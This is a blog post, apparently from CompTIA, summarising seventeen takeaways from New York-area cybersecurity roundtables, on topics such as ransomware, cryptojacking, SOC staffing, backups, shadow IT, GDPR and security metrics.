Dr. James Stanger is CompTIA's Chief Technology Evangelist.   He’s a CompTIA super hero in my book….traveling all over the world, speaking at events, impacting and representing the IT industry and CompTIA near and far.  

I’m thankful to work with James on a series of roundtables we recently hosted in the New York area.  He’s engaging with or without his beloved Diet Coke and facilitated great conversation among our cyber professionals.  Here are his top take-aways from the discussion.

1. File-less security threats. Who needs traditional malware when you can wrap Python code around an image that does the same thing?  After all, today’s computing devices – from PCs to IoT devices – have a full stack of tools, libraries, and interpreters that any good hacker can use to spin up any number of unexpected attacks. The implication is this: Yes, we need to educate our end users. But we also need to limit the number of tools we keep lying around, waiting for hackers to turn into improvised hacking devices.

2. The importance of constant monitoring - over and above SIEM or intrusion detection solutions. It’s very possible the next cutting-edge service will be third-party monitoring – the potential exists for companies to provide this service for a very reasonable fee.

3. Ransomware is getting worse - backups and restoration services are critical, in addition to end user training. Some even discussed the ability for instant reconstructive services, over and above backup.

4. We're seeing Security Operation Center (SOC) teams get moved over to help desk and technical support centers, which most on the panel saw as a disaster. Most of the group felt that conflicts of interest would occur. After all, we all know about the concept of segregation of duties; what happens when the need (or impulse) to provide tech support trumps security concerns? It’s not a matter of if, but when.

5. Cryptojacking is a big trend now, including one MSP that actually installed cryptomining software on its clients machines without notice. The MSP’s explanation? They don't get paid enough for their security services, but the cryptomining software they install makes up for that! Good heavens!


6. A quarter of the organizations the MSPs and technology executives on our panel work with initially do no backup at all. None. Zero. Zip. Nada. Good grief!


7. End user training is a vital security layer - as long as it is tied to an improvement policy. No one wants to become the “security police.” But, there comes a time when anyone who uses networked equipment needs to shoulder some responsibility.


8. IT managers and directors don't understand their own IT environment properly, mainly due to "shadow IT." Back in the day, IT and security managers tried to shut down “shadow IT” operations. Today, shadow or “stealth IT” is something to be managed.

9. Ever wonder what market sectors the hackers are attacking the most? According to our roundtable, today’s hackers are "following the money," and attacking law, healthcare, education and accountancy firms at a breakneck pace.

10. Improving security isn't just a tech issue; it's a company culture issue.

11. We’re seeing an explosion of devices/wearables, and are now being asked to secure Industrial Control Systems (ICS) such as SCADA, HVAC, elevators and robots more than ever before.  

12. As far as new security trends are concerned, the group is seeing the advent of analytics approaches in a big way. They’re also anticipating how blockchain and AI will become consumerized in the security space, as well.

13. The group, like most, recognized the need for cybersecurity regulation, but stated that compliance-based approaches are never enough. Companies and organizations need leadership; many C-suite leaders fail to see the costs investment to protect the organization. So, it’s up to IT leaders to “paint the picture” for C-suite and board-level individuals, to discuss risk in business terms, not simply lots of “tech talk.”

14. The roundtable members saw a distinct need for real, practical, and customized cybersecurity metrics for organizations. While there’s no single set of usable, practical metrics for each organization, there surely is a common thread that the industry can discuss and learn from. This is especially interesting to us here at CompTIA, because we’ve been thinking the same thing! Stay tuned – we’ll soon be releasing research results about security metrics. This research is derived from cybersecurity practitioners around the world, and focuses on the security metrics that they use. It will also talk about how they use these metrics to justify Return on Investment (ROI) for their security teams, controls, and operations. This will be real metrics, derived from actual practitioners, rather than software companies, the media, or people who are guessing. It’s exciting to see how our research and our roundtables naturally start addressing the same topics! Great minds think alike!

15. GDPR: We see the benefits, but isn’t it a bit extreme? Are we going to see more businesses simply stop doing business with the EU, create workarounds? Or, will we see increased regulation worldwide, including the United States?

16.  IT folks want to provide services – “to make stuff work.” Security pros always want to look at things differently, and anticipate problems. They are people who look at things “awry” – they enjoy taking things apart and adding strictness to keep things secure. 

17. Workforce development; the roundtable members felt that organizations need to train your workers and assume they might leave. It’s vital to mitigate employee loss, and have a pipeline funnel for talent.  Invest in the right people. The people you train need to have the right personality for training. Internally, certifications maybe used as a motivator to build careers. 

Special thanks to Titu Sarder of NetCom Learning for his partnership and securing space for us at Microsoft.

Thanks to all our roundtable participants.